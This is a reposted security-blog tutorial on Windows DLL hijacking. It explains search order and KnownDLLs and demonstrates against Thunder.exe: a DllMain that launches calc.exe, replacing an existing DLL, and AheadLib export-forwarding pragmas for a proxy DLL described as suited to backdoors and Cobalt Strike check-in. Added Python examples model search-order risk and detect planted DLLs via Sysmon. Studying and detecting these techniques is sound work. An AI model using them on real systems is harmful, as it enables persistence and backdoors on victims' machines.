DLL Hijacking

Penetration techniques · 2 years ago (2023) · admin

Learning DLL Hijacking

A DLL (Dynamic Link Library) file is a dynamic link library, also called an "application extension"; it is a software file type. On Windows, many applications are not one complete executable: they are split into relatively independent dynamic link libraries that contain code and data usable by several programs at the same time. These libraries are the DLL files.


With Procmon you can see that WeChat's main program, Wechat.exe, loads a large number of DLL files at startup.

Put simply, a DLL is like a standalone program that other programs call whenever they need it. Because a DLL hijack is cheap to find and tends to survive for a long time, it is frequently used for persistence or for phishing.

DLL load order and how it has changed

On Windows XP SP2 and later, the default DLL search order is as follows.

With safe DLL search mode enabled:

1. The directory from which the application loaded
2. The system directory
3. The 16-bit system directory
4. The Windows directory
5. The current directory
6. The directories listed in the PATH environment variable

With safe DLL search mode disabled:

1. The directory from which the application loaded
2. The current directory
3. The system directory
4. The 16-bit system directory
5. The Windows directory
6. The directories listed in the PATH environment variable


MSDN's description of DLL loading: https://learn.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order


Since Windows 7, to curb DLL hijacking, Microsoft has used the KnownDLLs registry key to list DLLs that are easy to hijack. When a program calls a DLL listed there, it is no longer loaded from the EXE's own directory but only from the system directory, i.e. SYSTEM32.
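The search order above (both modes) and the KnownDLLs override, worked through as an added Python example that is not part of the original post. It resolves where the loader would take a DLL from and lists the locations, outside the OS's control, that are consulted before that point; the directory contents and the KnownDLLs list are constructed.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Search order from the section above: safe mode and legacy (unsafe) mode.
SAFE_MODE_ORDER = ["app", "system", "system16", "windows", "cwd", "path"]
UNSAFE_MODE_ORDER = ["app", "cwd", "system", "system16", "windows", "path"]
# Only these locations are under the OS's control; the others are places where
# whoever can write there could plant a copy of the DLL.
TRUSTED = {"system", "system16", "windows"}

@dataclass
class Host:
    contents: dict[str, set[str]]            # constructed: DLL names per location
    known_dlls: set[str] = field(default_factory=set)   # constructed KnownDLLs
    safe_search: bool = True

    def order(self) -> list[str]:
        return SAFE_MODE_ORDER if self.safe_search else UNSAFE_MODE_ORDER

    def has(self, loc: str, dll: str) -> bool:
        return dll.lower() in {n.lower() for n in self.contents.get(loc, set())}

    def is_known(self, dll: str) -> bool:
        return dll.lower() in {k.lower() for k in self.known_dlls}

def resolve(host: Host, dll: str) -> str | None:
    """Location the loader would take the DLL from, or None (NAME NOT FOUND)."""
    if host.is_known(dll):
        return "system"                      # KnownDLLs: system directory only
    for loc in host.order():
        if host.has(loc, dll):
            return loc
    return None

def exposed_dirs(host: Host, dll: str) -> list[str]:
    """Untrusted locations consulted up to the point the DLL is found (all of
    them if it is never found): a copy planted there would be loaded instead."""
    if host.is_known(dll):
        return []
    order, found = host.order(), resolve(host, dll)
    searched = order if found is None else order[:order.index(found) + 1]
    return [loc for loc in searched if loc not in TRUSTED]

def hijack_risk(host: Host, dll: str) -> str:
    """Classify one load: 'known_dll', 'ok', 'not_found' or 'untrusted_dir'."""
    if host.is_known(dll):
        return "known_dll"
    found = resolve(host, dll)
    if found is None:
        return "not_found"
    return "ok" if found in TRUSTED else "untrusted_dir"
```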



With the above in mind, hunting for a DLL hijack can roughly be broken into the following steps:

1. Start the target EXE.

2. Use a process monitoring tool to observe which DLLs the EXE loads after starting.

3. Find a DLL that is suitable for hijacking.

4. Write the DLL and place it in the same directory as the EXE.

5. Start the EXE again and observe the result.

Hijacking a DLL that does not exist

Process monitoring shows that some EXEs try to load DLLs that do not exist, without affecting the program's normal execution. These NOT FOUND DLLs are candidates for hijacking.

Thunder is used as the example here.

Monitor the Thunder.exe process.



As a demonstration, here is a DLL that pops up Calculator.

```cpp
#include <windows.h>

// Demo payload from the post: launch calc.exe when the DLL is mapped into the process.
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        si.cb = sizeof(si);               // CreateProcess requires cb to be set
        CreateProcessA(NULL,              // No module name (use command line)
                       (LPSTR)"calc.exe", // Command line
                       NULL,              // Process handle not inheritable
                       NULL,              // Thread handle not inheritable
                       FALSE,             // Set handle inheritance to FALSE
                       0,                 // No creation flags
                       NULL,              // Use parent's environment block
                       NULL,              // Use parent's starting directory
                       &si,               // Pointer to STARTUPINFO structure
                       &pi);              // Pointer to PROCESS_INFORMATION structure
        break;                            // was missing: fell through into the cases below
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Place the compiled DLL in the same directory as Thunder.exe, with the same name as the DLL being hijacked.


Start the EXE again; the DLL has now been loaded successfully.


The result looks like this.


Hijacking an existing DLL

Continue monitoring the process with Procmon, this time filtering for entries whose RESULT is SUCCESS.


In some cases a program can still finish initialising when one of its DLLs is missing; in that case the malicious DLL can simply replace the original one.

For example, observation shows that Thunder.exe can still start without XLBugHandler.dll (this DLL probably handles program errors).


By renaming the malicious DLL, the pop-up appears while the program initialises.


Observing that the EXE loads this DLL dynamically shows that a recurring task can be run from it.


For example, loading shellcode into the current process to check in to CS.


Forwarding DLLs

When an EXE needs to call a function, it looks for it in the specified DLL. A forwarding DLL sits between the two as a bridge, which makes it well suited to quickly building a backdoor.

[Figure: how DLL forwarding works]

In Procmon, pick any DLL that Thunder.exe loads successfully.


Use AheadLib to forward the functions directly.


Put the generated forwarding directives in dllmain.cpp.

```cpp
#pragma comment(linker, "/EXPORT:XML_DefaultCurrent=libexpatOrg.XML_DefaultCurrent,@1")
#pragma comment(linker, "/EXPORT:XML_ErrorString=libexpatOrg.XML_ErrorString,@2")
#pragma comment(linker, "/EXPORT:XML_ExpatVersion=libexpatOrg.XML_ExpatVersion,@3")
#pragma comment(linker, "/EXPORT:XML_ExpatVersionInfo=libexpatOrg.XML_ExpatVersionInfo,@4")
#pragma comment(linker, "/EXPORT:XML_ExternalEntityParserCreate=libexpatOrg.XML_ExternalEntityParserCreate,@5")
#pragma comment(linker, "/EXPORT:XML_GetBase=libexpatOrg.XML_GetBase,@6")
#pragma comment(linker, "/EXPORT:XML_GetBuffer=libexpatOrg.XML_GetBuffer,@7")
#pragma comment(linker, "/EXPORT:XML_GetCurrentByteCount=libexpatOrg.XML_GetCurrentByteCount,@8")
#pragma comment(linker, "/EXPORT:XML_GetCurrentByteIndex=libexpatOrg.XML_GetCurrentByteIndex,@9")
#pragma comment(linker, "/EXPORT:XML_GetCurrentColumnNumber=libexpatOrg.XML_GetCurrentColumnNumber,@10")
#pragma comment(linker, "/EXPORT:XML_GetCurrentLineNumber=libexpatOrg.XML_GetCurrentLineNumber,@11")
#pragma comment(linker, "/EXPORT:XML_GetErrorCode=libexpatOrg.XML_GetErrorCode,@12")
#pragma comment(linker, "/EXPORT:XML_GetIdAttributeIndex=libexpatOrg.XML_GetIdAttributeIndex,@13")
#pragma comment(linker, "/EXPORT:XML_GetInputContext=libexpatOrg.XML_GetInputContext,@14")
#pragma comment(linker, "/EXPORT:XML_GetSpecifiedAttributeCount=libexpatOrg.XML_GetSpecifiedAttributeCount,@15")
#pragma comment(linker, "/EXPORT:XML_Parse=libexpatOrg.XML_Parse,@16")
#pragma comment(linker, "/EXPORT:XML_ParseBuffer=libexpatOrg.XML_ParseBuffer,@17")
#pragma comment(linker, "/EXPORT:XML_ParserCreate=libexpatOrg.XML_ParserCreate,@18")
#pragma comment(linker, "/EXPORT:XML_ParserCreateNS=libexpatOrg.XML_ParserCreateNS,@19")
#pragma comment(linker, "/EXPORT:XML_ParserCreate_MM=libexpatOrg.XML_ParserCreate_MM,@20")
#pragma comment(linker, "/EXPORT:XML_ParserFree=libexpatOrg.XML_ParserFree,@21")
#pragma comment(linker, "/EXPORT:XML_SetAttlistDeclHandler=libexpatOrg.XML_SetAttlistDeclHandler,@22")
#pragma comment(linker, "/EXPORT:XML_SetBase=libexpatOrg.XML_SetBase,@23")
#pragma comment(linker, "/EXPORT:XML_SetCdataSectionHandler=libexpatOrg.XML_SetCdataSectionHandler,@24")
#pragma comment(linker, "/EXPORT:XML_SetCharacterDataHandler=libexpatOrg.XML_SetCharacterDataHandler,@25")
#pragma comment(linker, "/EXPORT:XML_SetCommentHandler=libexpatOrg.XML_SetCommentHandler,@26")
#pragma comment(linker, "/EXPORT:XML_SetDefaultHandler=libexpatOrg.XML_SetDefaultHandler,@27")
#pragma comment(linker, "/EXPORT:XML_SetDefaultHandlerExpand=libexpatOrg.XML_SetDefaultHandlerExpand,@28")
#pragma comment(linker, "/EXPORT:XML_SetDoctypeDeclHandler=libexpatOrg.XML_SetDoctypeDeclHandler,@29")
#pragma comment(linker, "/EXPORT:XML_SetElementDeclHandler=libexpatOrg.XML_SetElementDeclHandler,@30")
#pragma comment(linker, "/EXPORT:XML_SetElementHandler=libexpatOrg.XML_SetElementHandler,@31")
#pragma comment(linker, "/EXPORT:XML_SetEncoding=libexpatOrg.XML_SetEncoding,@32")
#pragma comment(linker, "/EXPORT:XML_SetEndCdataSectionHandler=libexpatOrg.XML_SetEndCdataSectionHandler,@33")
#pragma comment(linker, "/EXPORT:XML_SetEndDoctypeDeclHandler=libexpatOrg.XML_SetEndDoctypeDeclHandler,@34")
#pragma comment(linker, "/EXPORT:XML_SetEndElementHandler=libexpatOrg.XML_SetEndElementHandler,@35")
#pragma comment(linker, "/EXPORT:XML_SetEndNamespaceDeclHandler=libexpatOrg.XML_SetEndNamespaceDeclHandler,@36")
#pragma comment(linker, "/EXPORT:XML_SetEntityDeclHandler=libexpatOrg.XML_SetEntityDeclHandler,@37")
#pragma comment(linker, "/EXPORT:XML_SetExternalEntityRefHandler=libexpatOrg.XML_SetExternalEntityRefHandler,@38")
#pragma comment(linker, "/EXPORT:XML_SetExternalEntityRefHandlerArg=libexpatOrg.XML_SetExternalEntityRefHandlerArg,@39")
#pragma comment(linker, "/EXPORT:XML_SetNamespaceDeclHandler=libexpatOrg.XML_SetNamespaceDeclHandler,@40")
#pragma comment(linker, "/EXPORT:XML_SetNotStandaloneHandler=libexpatOrg.XML_SetNotStandaloneHandler,@41")
#pragma comment(linker, "/EXPORT:XML_SetNotationDeclHandler=libexpatOrg.XML_SetNotationDeclHandler,@42")
#pragma comment(linker, "/EXPORT:XML_SetParamEntityParsing=libexpatOrg.XML_SetParamEntityParsing,@43")
#pragma comment(linker, "/EXPORT:XML_SetProcessingInstructionHandler=libexpatOrg.XML_SetProcessingInstructionHandler,@44")
#pragma comment(linker, "/EXPORT:XML_SetReturnNSTriplet=libexpatOrg.XML_SetReturnNSTriplet,@45")
#pragma comment(linker, "/EXPORT:XML_SetStartCdataSectionHandler=libexpatOrg.XML_SetStartCdataSectionHandler,@46")
#pragma comment(linker, "/EXPORT:XML_SetStartDoctypeDeclHandler=libexpatOrg.XML_SetStartDoctypeDeclHandler,@47")
#pragma comment(linker, "/EXPORT:XML_SetStartElementHandler=libexpatOrg.XML_SetStartElementHandler,@48")
#pragma comment(linker, "/EXPORT:XML_SetStartNamespaceDeclHandler=libexpatOrg.XML_SetStartNamespaceDeclHandler,@49")
#pragma comment(linker, "/EXPORT:XML_SetUnknownEncodingHandler=libexpatOrg.XML_SetUnknownEncodingHandler,@50")
#pragma comment(linker, "/EXPORT:XML_SetUnparsedEntityDeclHandler=libexpatOrg.XML_SetUnparsedEntityDeclHandler,@51")
#pragma comment(linker, "/EXPORT:XML_SetUserData=libexpatOrg.XML_SetUserData,@52")
#pragma comment(linker, "/EXPORT:XML_SetXmlDeclHandler=libexpatOrg.XML_SetXmlDeclHandler,@53")
#pragma comment(linker, "/EXPORT:XML_UseParserAsHandlerArg=libexpatOrg.XML_UseParserAsHandlerArg,@54")
#pragma comment(linker, "/EXPORT:XML_ParserReset=libexpatOrg.XML_ParserReset,@55")
#pragma comment(linker, "/EXPORT:XML_SetSkippedEntityHandler=libexpatOrg.XML_SetSkippedEntityHandler,@56")
#pragma comment(linker, "/EXPORT:XML_GetFeatureList=libexpatOrg.XML_GetFeatureList,@57")
#pragma comment(linker, "/EXPORT:XML_UseForeignDTD=libexpatOrg.XML_UseForeignDTD,@58")
#pragma comment(linker, "/EXPORT:XML_FreeContentModel=libexpatOrg.XML_FreeContentModel,@59")
#pragma comment(linker, "/EXPORT:XML_MemMalloc=libexpatOrg.XML_MemMalloc,@60")
#pragma comment(linker, "/EXPORT:XML_MemRealloc=libexpatOrg.XML_MemRealloc,@61")
#pragma comment(linker, "/EXPORT:XML_MemFree=libexpatOrg.XML_MemFree,@62")
#pragma comment(linker, "/EXPORT:XML_StopParser=libexpatOrg.XML_StopParser,@63")
#pragma comment(linker, "/EXPORT:XML_ResumeParser=libexpatOrg.XML_ResumeParser,@64")
#pragma comment(linker, "/EXPORT:XML_GetParsingStatus=libexpatOrg.XML_GetParsingStatus,@65")
```


The forwarding result looks like this.

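Detection logic for the same-directory hijacks covered in the two sections above (a replaced existing DLL, and a forwarding DLL dropped next to the EXE), as an added Python example that is not part of the original post. It runs two rules over Sysmon Event ID 7 (Image Loaded) records: a DLL loaded from the process's own directory that carries a System32 file name, and a DLL there that is unsigned or has an invalid signature; the records and the System32 name list are constructed.

```python
from __future__ import annotations
import ntpath

# Directories the OS controls; loads from here are not the pattern above.
OS_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed: file names present in System32 on the monitored host.
SYSTEM32_NAMES = {"kernel32.dll", "version.dll"}

# Constructed records using Sysmon Event ID 7 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Thunder\Thunder.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Thunder\Thunder.exe",        # planted, unsigned
     "ImageLoaded": r"C:\Program Files\Thunder\XLBugHandler.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Program Files\Thunder\Thunder.exe",        # System32 name, app dir
     "ImageLoaded": r"C:\Program Files\Thunder\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Thunder\Thunder.exe",        # legitimate vendor DLL
     "ImageLoaded": r"C:\Program Files\Thunder\libexpat.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]

def _lower_dir(path: str) -> str:
    return ntpath.dirname(path).lower()

def check_event(ev: dict, system32_names: set[str]) -> str | None:
    """Alert reason for one Image Loaded record, or None if it looks normal."""
    dll_dir = _lower_dir(ev["ImageLoaded"])
    if dll_dir in OS_DIRS or dll_dir != _lower_dir(ev["Image"]):
        return None                        # only the same-directory pattern here
    dll_name = ntpath.basename(ev["ImageLoaded"]).lower()
    if dll_name in system32_names:
        return "DLL with a System32 name loaded from the application directory"
    if ev.get("Signed") != "true" or ev.get("SignatureStatus") != "Valid":
        return "unsigned or invalidly signed DLL in the application directory"
    return None

def analyze(events, system32_names=SYSTEM32_NAMES):
    """Return (ImageLoaded, reason) for every record that trips a rule."""
    hits = []
    for ev in events:
        reason = check_event(ev, system32_names)
        if reason:
            hits.append((ev["ImageLoaded"], reason))
    return hits
```

A forwarding DLL built from the pragmas above would be caught by the second rule, since it replaces a vendor-signed file with an unsigned one of the same name.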


This article originally appeared on the WeChat public account dada安全研究所: DLL Hijacking

Copyright notice: posted by admin on 21 February 2023 at 1:22 PM.
Please credit when reposting: DLL Hijacking | CTF导航
